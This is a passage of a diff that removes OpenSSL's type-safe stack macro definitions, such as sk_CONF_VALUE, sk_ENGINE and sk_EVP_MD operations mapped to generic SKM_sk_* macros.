-#define sk_CMS_SignerInfo_pop(st) SKM_sk_pop(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_sort(st) SKM_sk_sort(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_is_sorted(st) SKM_sk_is_sorted(CMS_SignerInfo, (st))
-
-#define sk_CONF_IMODULE_new(cmp) SKM_sk_new(CONF_IMODULE, (cmp))
-#define sk_CONF_IMODULE_new_null() SKM_sk_new_null(CONF_IMODULE)
-#define sk_CONF_IMODULE_free(st) SKM_sk_free(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_num(st) SKM_sk_num(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_value(st, i) SKM_sk_value(CONF_IMODULE, (st), (i))
-#define sk_CONF_IMODULE_set(st, i, val) SKM_sk_set(CONF_IMODULE, (st), (i), (val))
-#define sk_CONF_IMODULE_zero(st) SKM_sk_zero(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_push(st, val) SKM_sk_push(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_unshift(st, val) SKM_sk_unshift(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_find(st, val) SKM_sk_find(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_find_ex(st, val) SKM_sk_find_ex(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_delete(st, i) SKM_sk_delete(CONF_IMODULE, (st), (i))
-#define sk_CONF_IMODULE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_IMODULE, (st), (ptr))
-#define sk_CONF_IMODULE_insert(st, val, i) SKM_sk_insert(CONF_IMODULE, (st), (val), (i))
-#define sk_CONF_IMODULE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_IMODULE, (st), (cmp))
-#define sk_CONF_IMODULE_dup(st) SKM_sk_dup(CONF_IMODULE, st)
-#define sk_CONF_IMODULE_pop_free(st, free_func) SKM_sk_pop_free(CONF_IMODULE, (st), (free_func))
-#define sk_CONF_IMODULE_shift(st) SKM_sk_shift(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_pop(st) SKM_sk_pop(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_sort(st) SKM_sk_sort(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_is_sorted(st) SKM_sk_is_sorted(CONF_IMODULE, (st))
-
-#define sk_CONF_MODULE_new(cmp) SKM_sk_new(CONF_MODULE, (cmp))
-#define sk_CONF_MODULE_new_null() SKM_sk_new_null(CONF_MODULE)
-#define sk_CONF_MODULE_free(st) SKM_sk_free(CONF_MODULE, (st))
-#define sk_CONF_MODULE_num(st) SKM_sk_num(CONF_MODULE, (st))
-#define sk_CONF_MODULE_value(st, i) SKM_sk_value(CONF_MODULE, (st), (i))
-#define sk_CONF_MODULE_set(st, i, val) SKM_sk_set(CONF_MODULE, (st), (i), (val))
-#define sk_CONF_MODULE_zero(st) SKM_sk_zero(CONF_MODULE, (st))
-#define sk_CONF_MODULE_push(st, val) SKM_sk_push(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_unshift(st, val) SKM_sk_unshift(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_find(st, val) SKM_sk_find(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_find_ex(st, val) SKM_sk_find_ex(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_delete(st, i) SKM_sk_delete(CONF_MODULE, (st), (i))
-#define sk_CONF_MODULE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_MODULE, (st), (ptr))
-#define sk_CONF_MODULE_insert(st, val, i) SKM_sk_insert(CONF_MODULE, (st), (val), (i))
-#define sk_CONF_MODULE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_MODULE, (st), (cmp))
-#define sk_CONF_MODULE_dup(st) SKM_sk_dup(CONF_MODULE, st)
-#define sk_CONF_MODULE_pop_free(st, free_func) SKM_sk_pop_free(CONF_MODULE, (st), (free_func))
-#define sk_CONF_MODULE_shift(st) SKM_sk_shift(CONF_MODULE, (st))
-#define sk_CONF_MODULE_pop(st) SKM_sk_pop(CONF_MODULE, (st))
-#define sk_CONF_MODULE_sort(st) SKM_sk_sort(CONF_MODULE, (st))
-#define sk_CONF_MODULE_is_sorted(st) SKM_sk_is_sorted(CONF_MODULE, (st))
-
-#define sk_CONF_VALUE_new(cmp) SKM_sk_new(CONF_VALUE, (cmp))
-#define sk_CONF_VALUE_new_null() SKM_sk_new_null(CONF_VALUE)
-#define sk_CONF_VALUE_free(st) SKM_sk_free(CONF_VALUE, (st))
-#define sk_CONF_VALUE_num(st) SKM_sk_num(CONF_VALUE, (st))
-#define sk_CONF_VALUE_value(st, i) SKM_sk_value(CONF_VALUE, (st), (i))
-#define sk_CONF_VALUE_set(st, i, val) SKM_sk_set(CONF_VALUE, (st), (i), (val))
-#define sk_CONF_VALUE_zero(st) SKM_sk_zero(CONF_VALUE, (st))
-#define sk_CONF_VALUE_push(st, val) SKM_sk_push(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_unshift(st, val) SKM_sk_unshift(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_find(st, val) SKM_sk_find(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_find_ex(st, val) SKM_sk_find_ex(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_delete(st, i) SKM_sk_delete(CONF_VALUE, (st), (i))
-#define sk_CONF_VALUE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_VALUE, (st), (ptr))
-#define sk_CONF_VALUE_insert(st, val, i) SKM_sk_insert(CONF_VALUE, (st), (val), (i))
-#define sk_CONF_VALUE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_VALUE, (st), (cmp))
-#define sk_CONF_VALUE_dup(st) SKM_sk_dup(CONF_VALUE, st)
-#define sk_CONF_VALUE_pop_free(st, free_func) SKM_sk_pop_free(CONF_VALUE, (st), (free_func))
-#define sk_CONF_VALUE_shift(st) SKM_sk_shift(CONF_VALUE, (st))
-#define sk_CONF_VALUE_pop(st) SKM_sk_pop(CONF_VALUE, (st))
-#define sk_CONF_VALUE_sort(st) SKM_sk_sort(CONF_VALUE, (st))
-#define sk_CONF_VALUE_is_sorted(st) SKM_sk_is_sorted(CONF_VALUE, (st))
-
-#define sk_CRYPTO_EX_DATA_FUNCS_new(cmp) SKM_sk_new(CRYPTO_EX_DATA_FUNCS, (cmp))
-#define sk_CRYPTO_EX_DATA_FUNCS_new_null() SKM_sk_new_null(CRYPTO_EX_DATA_FUNCS)
-#define sk_CRYPTO_EX_DATA_FUNCS_free(st) SKM_sk_free(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_num(st) SKM_sk_num(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_value(st, i) SKM_sk_value(CRYPTO_EX_DATA_FUNCS, (st), (i))
-#define sk_CRYPTO_EX_DATA_FUNCS_set(st, i, val) SKM_sk_set(CRYPTO_EX_DATA_FUNCS, (st), (i), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_zero(st) SKM_sk_zero(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_push(st, val) SKM_sk_push(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_unshift(st, val) SKM_sk_unshift(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_find(st, val) SKM_sk_find(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_find_ex(st, val) SKM_sk_find_ex(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_delete(st, i) SKM_sk_delete(CRYPTO_EX_DATA_FUNCS, (st), (i))
-#define sk_CRYPTO_EX_DATA_FUNCS_delete_ptr(st, ptr) SKM_sk_delete_ptr(CRYPTO_EX_DATA_FUNCS, (st), (ptr))
-#define sk_CRYPTO_EX_DATA_FUNCS_insert(st, val, i) SKM_sk_insert(CRYPTO_EX_DATA_FUNCS, (st), (val), (i))
-#define sk_CRYPTO_EX_DATA_FUNCS_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CRYPTO_EX_DATA_FUNCS, (st), (cmp))
-#define sk_CRYPTO_EX_DATA_FUNCS_dup(st) SKM_sk_dup(CRYPTO_EX_DATA_FUNCS, st)
-#define sk_CRYPTO_EX_DATA_FUNCS_pop_free(st, free_func) SKM_sk_pop_free(CRYPTO_EX_DATA_FUNCS, (st), (free_func))
-#define sk_CRYPTO_EX_DATA_FUNCS_shift(st) SKM_sk_shift(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_pop(st) SKM_sk_pop(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_sort(st) SKM_sk_sort(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_is_sorted(st) SKM_sk_is_sorted(CRYPTO_EX_DATA_FUNCS, (st))
-
-#define sk_CRYPTO_dynlock_new(cmp) SKM_sk_new(CRYPTO_dynlock, (cmp))
-#define sk_CRYPTO_dynlock_new_null() SKM_sk_new_null(CRYPTO_dynlock)
-#define sk_CRYPTO_dynlock_free(st) SKM_sk_free(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_num(st) SKM_sk_num(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_value(st, i) SKM_sk_value(CRYPTO_dynlock, (st), (i))
-#define sk_CRYPTO_dynlock_set(st, i, val) SKM_sk_set(CRYPTO_dynlock, (st), (i), (val))
-#define sk_CRYPTO_dynlock_zero(st) SKM_sk_zero(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_push(st, val) SKM_sk_push(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_unshift(st, val) SKM_sk_unshift(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_find(st, val) SKM_sk_find(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_find_ex(st, val) SKM_sk_find_ex(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_delete(st, i) SKM_sk_delete(CRYPTO_dynlock, (st), (i))
-#define sk_CRYPTO_dynlock_delete_ptr(st, ptr) SKM_sk_delete_ptr(CRYPTO_dynlock, (st), (ptr))
-#define sk_CRYPTO_dynlock_insert(st, val, i) SKM_sk_insert(CRYPTO_dynlock, (st), (val), (i))
-#define sk_CRYPTO_dynlock_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CRYPTO_dynlock, (st), (cmp))
-#define sk_CRYPTO_dynlock_dup(st) SKM_sk_dup(CRYPTO_dynlock, st)
-#define sk_CRYPTO_dynlock_pop_free(st, free_func) SKM_sk_pop_free(CRYPTO_dynlock, (st), (free_func))
-#define sk_CRYPTO_dynlock_shift(st) SKM_sk_shift(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_pop(st) SKM_sk_pop(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_sort(st) SKM_sk_sort(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_is_sorted(st) SKM_sk_is_sorted(CRYPTO_dynlock, (st))
-
-#define sk_DIST_POINT_new(cmp) SKM_sk_new(DIST_POINT, (cmp))
-#define sk_DIST_POINT_new_null() SKM_sk_new_null(DIST_POINT)
-#define sk_DIST_POINT_free(st) SKM_sk_free(DIST_POINT, (st))
-#define sk_DIST_POINT_num(st) SKM_sk_num(DIST_POINT, (st))
-#define sk_DIST_POINT_value(st, i) SKM_sk_value(DIST_POINT, (st), (i))
-#define sk_DIST_POINT_set(st, i, val) SKM_sk_set(DIST_POINT, (st), (i), (val))
-#define sk_DIST_POINT_zero(st) SKM_sk_zero(DIST_POINT, (st))
-#define sk_DIST_POINT_push(st, val) SKM_sk_push(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_unshift(st, val) SKM_sk_unshift(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_find(st, val) SKM_sk_find(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_find_ex(st, val) SKM_sk_find_ex(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_delete(st, i) SKM_sk_delete(DIST_POINT, (st), (i))
-#define sk_DIST_POINT_delete_ptr(st, ptr) SKM_sk_delete_ptr(DIST_POINT, (st), (ptr))
-#define sk_DIST_POINT_insert(st, val, i) SKM_sk_insert(DIST_POINT, (st), (val), (i))
-#define sk_DIST_POINT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(DIST_POINT, (st), (cmp))
-#define sk_DIST_POINT_dup(st) SKM_sk_dup(DIST_POINT, st)
-#define sk_DIST_POINT_pop_free(st, free_func) SKM_sk_pop_free(DIST_POINT, (st), (free_func))
-#define sk_DIST_POINT_shift(st) SKM_sk_shift(DIST_POINT, (st))
-#define sk_DIST_POINT_pop(st) SKM_sk_pop(DIST_POINT, (st))
-#define sk_DIST_POINT_sort(st) SKM_sk_sort(DIST_POINT, (st))
-#define sk_DIST_POINT_is_sorted(st) SKM_sk_is_sorted(DIST_POINT, (st))
-
-#define sk_ENGINE_new(cmp) SKM_sk_new(ENGINE, (cmp))
-#define sk_ENGINE_new_null() SKM_sk_new_null(ENGINE)
-#define sk_ENGINE_free(st) SKM_sk_free(ENGINE, (st))
-#define sk_ENGINE_num(st) SKM_sk_num(ENGINE, (st))
-#define sk_ENGINE_value(st, i) SKM_sk_value(ENGINE, (st), (i))
-#define sk_ENGINE_set(st, i, val) SKM_sk_set(ENGINE, (st), (i), (val))
-#define sk_ENGINE_zero(st) SKM_sk_zero(ENGINE, (st))
-#define sk_ENGINE_push(st, val) SKM_sk_push(ENGINE, (st), (val))
-#define sk_ENGINE_unshift(st, val) SKM_sk_unshift(ENGINE, (st), (val))
-#define sk_ENGINE_find(st, val) SKM_sk_find(ENGINE, (st), (val))
-#define sk_ENGINE_find_ex(st, val) SKM_sk_find_ex(ENGINE, (st), (val))
-#define sk_ENGINE_delete(st, i) SKM_sk_delete(ENGINE, (st), (i))
-#define sk_ENGINE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ENGINE, (st), (ptr))
-#define sk_ENGINE_insert(st, val, i) SKM_sk_insert(ENGINE, (st), (val), (i))
-#define sk_ENGINE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ENGINE, (st), (cmp))
-#define sk_ENGINE_dup(st) SKM_sk_dup(ENGINE, st)
-#define sk_ENGINE_pop_free(st, free_func) SKM_sk_pop_free(ENGINE, (st), (free_func))
-#define sk_ENGINE_shift(st) SKM_sk_shift(ENGINE, (st))
-#define sk_ENGINE_pop(st) SKM_sk_pop(ENGINE, (st))
-#define sk_ENGINE_sort(st) SKM_sk_sort(ENGINE, (st))
-#define sk_ENGINE_is_sorted(st) SKM_sk_is_sorted(ENGINE, (st))
-
-#define sk_ENGINE_CLEANUP_ITEM_new(cmp) SKM_sk_new(ENGINE_CLEANUP_ITEM, (cmp))
-#define sk_ENGINE_CLEANUP_ITEM_new_null() SKM_sk_new_null(ENGINE_CLEANUP_ITEM)
-#define sk_ENGINE_CLEANUP_ITEM_free(st) SKM_sk_free(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_num(st) SKM_sk_num(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_value(st, i) SKM_sk_value(ENGINE_CLEANUP_ITEM, (st), (i))
-#define sk_ENGINE_CLEANUP_ITEM_set(st, i, val) SKM_sk_set(ENGINE_CLEANUP_ITEM, (st), (i), (val))
-#define sk_ENGINE_CLEANUP_ITEM_zero(st) SKM_sk_zero(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_push(st, val) SKM_sk_push(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_unshift(st, val) SKM_sk_unshift(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_find(st, val) SKM_sk_find(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_find_ex(st, val) SKM_sk_find_ex(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_delete(st, i) SKM_sk_delete(ENGINE_CLEANUP_ITEM, (st), (i))
-#define sk_ENGINE_CLEANUP_ITEM_delete_ptr(st, ptr) SKM_sk_delete_ptr(ENGINE_CLEANUP_ITEM, (st), (ptr))
-#define sk_ENGINE_CLEANUP_ITEM_insert(st, val, i) SKM_sk_insert(ENGINE_CLEANUP_ITEM, (st), (val), (i))
-#define sk_ENGINE_CLEANUP_ITEM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ENGINE_CLEANUP_ITEM, (st), (cmp))
-#define sk_ENGINE_CLEANUP_ITEM_dup(st) SKM_sk_dup(ENGINE_CLEANUP_ITEM, st)
-#define sk_ENGINE_CLEANUP_ITEM_pop_free(st, free_func) SKM_sk_pop_free(ENGINE_CLEANUP_ITEM, (st), (free_func))
-#define sk_ENGINE_CLEANUP_ITEM_shift(st) SKM_sk_shift(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_pop(st) SKM_sk_pop(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_sort(st) SKM_sk_sort(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_is_sorted(st) SKM_sk_is_sorted(ENGINE_CLEANUP_ITEM, (st))
-
-#define sk_ESS_CERT_ID_new(cmp) SKM_sk_new(ESS_CERT_ID, (cmp))
-#define sk_ESS_CERT_ID_new_null() SKM_sk_new_null(ESS_CERT_ID)
-#define sk_ESS_CERT_ID_free(st) SKM_sk_free(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_num(st) SKM_sk_num(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_value(st, i) SKM_sk_value(ESS_CERT_ID, (st), (i))
-#define sk_ESS_CERT_ID_set(st, i, val) SKM_sk_set(ESS_CERT_ID, (st), (i), (val))
-#define sk_ESS_CERT_ID_zero(st) SKM_sk_zero(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_push(st, val) SKM_sk_push(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_unshift(st, val) SKM_sk_unshift(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_find(st, val) SKM_sk_find(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_find_ex(st, val) SKM_sk_find_ex(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_delete(st, i) SKM_sk_delete(ESS_CERT_ID, (st), (i))
-#define sk_ESS_CERT_ID_delete_ptr(st, ptr) SKM_sk_delete_ptr(ESS_CERT_ID, (st), (ptr))
-#define sk_ESS_CERT_ID_insert(st, val, i) SKM_sk_insert(ESS_CERT_ID, (st), (val), (i))
-#define sk_ESS_CERT_ID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ESS_CERT_ID, (st), (cmp))
-#define sk_ESS_CERT_ID_dup(st) SKM_sk_dup(ESS_CERT_ID, st)
-#define sk_ESS_CERT_ID_pop_free(st, free_func) SKM_sk_pop_free(ESS_CERT_ID, (st), (free_func))
-#define sk_ESS_CERT_ID_shift(st) SKM_sk_shift(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_pop(st) SKM_sk_pop(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_sort(st) SKM_sk_sort(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_is_sorted(st) SKM_sk_is_sorted(ESS_CERT_ID, (st))
-
-#define sk_EVP_MD_new(cmp) SKM_sk_new(EVP_MD, (cmp))
-#define sk_EVP_MD_new_null() SKM_sk_new_null(EVP_MD)
-#define sk_EVP_MD_free(st) SKM_sk_free(EVP_MD, (st))
-#define sk_EVP_MD_num(st) SKM_sk_num(EVP_MD, (st))
-#define sk_EVP_MD_value(st, i) SKM_sk_value(EVP_MD, (st), (i))
-#define sk_EVP_MD_set(st, i, val) SKM_sk_set(EVP_MD, (st), (i), (val))
-#define sk_EVP_MD_zero(st) SKM_sk_zero(EVP_MD, (st))
-#define sk_EVP_MD_push(st, val) SKM_sk_push(EVP_MD, (st), (val))
-#define sk_EVP_MD_unshift(st, val) SKM_sk_unshift(EVP_MD, (st), (val))
-#define sk_EVP_MD_find(st, val) SKM_sk_find(EVP_MD, (st), (val))
-#define sk_EVP_MD_find_ex(st, val) SKM_sk_find_ex(EVP_MD, (st), (val))
-#define sk_EVP_MD_delete(st, i) SKM_sk_delete(EVP_MD, (st), (i))
-#define sk_EVP_MD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_MD, (st), (ptr))
-#define sk_EVP_MD_insert(st, val, i) SKM_sk_insert(EVP_MD, (st), (val), (i))
-#define sk_EVP_MD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_MD, (st), (cmp))
-#define sk_EVP_MD_dup(st) SKM_sk_dup(EVP_MD, st)
-#define sk_EVP_MD_pop_free(st, free_func) SKM_sk_pop_free(EVP_MD, (st), (free_func))
-#define sk_EVP_MD_shift(st) SKM_sk_shift(EVP_MD, (st))
-#define sk_EVP_MD_pop(st) SKM_sk_pop(EVP_MD, (st))
-#define sk_EVP_MD_sort(st) SKM_sk_sort(EVP_MD, (st))
-#define sk_EVP_MD_is_sorted(st) SKM_sk_is_sorted(EVP_MD, (st))
-
-#define sk_EVP_PBE_CTL_new(cmp) SKM_sk_new(EVP_PBE_CTL, (cmp))
-#define sk_EVP_PBE_CTL_new_null() SKM_sk_new_null(EVP_PBE_CTL)
-#define sk_EVP_PBE_CTL_free(st) SKM_sk_free(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_num(st) SKM_sk_num(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_value(st, i) SKM_sk_value(EVP_PBE_CTL, (st), (i))
-#define sk_EVP_PBE_CTL_set(st, i, val) SKM_sk_set(EVP_PBE_CTL, (st), (i), (val))
-#define sk_EVP_PBE_CTL_zero(st) SKM_sk_zero(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_push(st, val) SKM_sk_push(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_unshift(st, val) SKM_sk_unshift(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_find(st, val) SKM_sk_find(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_find_ex(st, val) SKM_sk_find_ex(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_delete(st, i) SKM_sk_delete(EVP_PBE_CTL, (st), (i))
-#define sk_EVP_PBE_CTL_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PBE_CTL, (st), (ptr))
-#define sk_EVP_PBE_CTL_insert(st, val, i) SKM_sk_insert(EVP_PBE_CTL, (st), (val), (i))
-#define sk_EVP_PBE_CTL_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PBE_CTL, (st), (cmp))
-#define sk_EVP_PBE_CTL_dup(st) SKM_sk_dup(EVP_PBE_CTL, st)
-#define sk_EVP_PBE_CTL_pop_free(st, free_func) SKM_sk_pop_free(EVP_PBE_CTL, (st), (free_func))
-#define sk_EVP_PBE_CTL_shift(st) SKM_sk_shift(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_pop(st) SKM_sk_pop(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_sort(st) SKM_sk_sort(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_is_sorted(st) SKM_sk_is_sorted(EVP_PBE_CTL, (st))
-
-#define sk_EVP_PKEY_ASN1_METHOD_new(cmp) SKM_sk_new(EVP_PKEY_ASN1_METHOD, (cmp))
-#define sk_EVP_PKEY_ASN1_METHOD_new_null() SKM_sk_new_null(EVP_PKEY_ASN1_METHOD)
-#define sk_EVP_PKEY_ASN1_METHOD_free(st) SKM_sk_free(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_num(st) SKM_sk_num(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_value(st, i) SKM_sk_value(EVP_PKEY_ASN1_METHOD, (st), (i))
-#define sk_EVP_PKEY_ASN1_METHOD_set(st, i, val) SKM_sk_set(EVP_PKEY_ASN1_METHOD, (st), (i), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_zero(st) SKM_sk_zero(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_push(st, val) SKM_sk_push(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_unshift(st, val) SKM_sk_unshift(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_find(st, val) SKM_sk_find(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_find_ex(st, val) SKM_sk_find_ex(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_delete(st, i) SKM_sk_delete(EVP_PKEY_ASN1_METHOD, (st), (i))
-#define sk_EVP_PKEY_ASN1_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PKEY_ASN1_METHOD, (st), (ptr))
-#define sk_EVP_PKEY_ASN1_METHOD_insert(st, val, i) SKM_sk_insert(EVP_PKEY_ASN1_METHOD, (st), (val), (i))
-#define sk_EVP_PKEY_ASN1_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PKEY_ASN1_METHOD, (st), (cmp))
-#define sk_EVP_PKEY_ASN1_METHOD_dup(st) SKM_sk_dup(EVP_PKEY_ASN1_METHOD, st)
-#define sk_EVP_PKEY_ASN1_METHOD_pop_free(st, free_func) SKM_sk_pop_free(EVP_PKEY_ASN1_METHOD, (st), (free_func))
-#define sk_EVP_PKEY_ASN1_METHOD_shift(st) SKM_sk_shift(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_pop(st) SKM_sk_pop(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_sort(st) SKM_sk_sort(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_is_sorted(st) SKM_sk_is_sorted(EVP_PKEY_ASN1_METHOD, (st))
-
-#define sk_EVP_PKEY_METHOD_new(cmp) SKM_sk_new(EVP_PKEY_METHOD, (cmp))
-#define sk_EVP_PKEY_METHOD_new_null() SKM_sk_new_null(EVP_PKEY_METHOD)
-#define sk_EVP_PKEY_METHOD_free(st) SKM_sk_free(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_num(st) SKM_sk_num(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_value(st, i) SKM_sk_value(EVP_PKEY_METHOD, (st), (i))
-#define sk_EVP_PKEY_METHOD_set(st, i, val) SKM_sk_set(EVP_PKEY_METHOD, (st), (i), (val))
-#define sk_EVP_PKEY_METHOD_zero(st) SKM_sk_zero(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_push(st, val) SKM_sk_push(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_unshift(st, val) SKM_sk_unshift(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_find(st, val) SKM_sk_find(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_find_ex(st, val) SKM_sk_find_ex(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_delete(st, i) SKM_sk_delete(EVP_PKEY_METHOD, (st), (i))
-#define sk_EVP_PKEY_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PKEY_METHOD, (st), (ptr))
-#define sk_EVP_PKEY_METHOD_insert(st, val, i) SKM_sk_insert(EVP_PKEY_METHOD, (st), (val), (i))
-#define sk_EVP_PKEY_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PKEY_METHOD, (st), (cmp))
-#define sk_EVP_PKEY_METHOD_dup(st) SKM_sk_dup(EVP_PKEY_METHOD, st)
-#define sk_EVP_PKEY_METHOD_pop_free(st, free_func) SKM_sk_pop_free(EVP_PKEY_METHOD, (st), (free_func))
-#define sk_EVP_PKEY_METHOD_shift(st) SKM_sk_shift(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_pop(st) SKM_sk_pop(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_sort(st) SKM_sk_sort(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_is_sorted(st) SKM_sk_is_sorted(EVP_PKEY_METHOD, (st))
-
-#define sk_GENERAL_NAME_new(cmp) SKM_sk_new(GENERAL_NAME, (cmp))
-#define sk_GENERAL_NAME_new_null() SKM_sk_new_null(GENERAL_NAME)
-#define sk_GENERAL_NAME_free(st) SKM_sk_free(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_num(st) SKM_sk_num(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_value(st, i) SKM_sk_value(GENERAL_NAME, (st), (i))
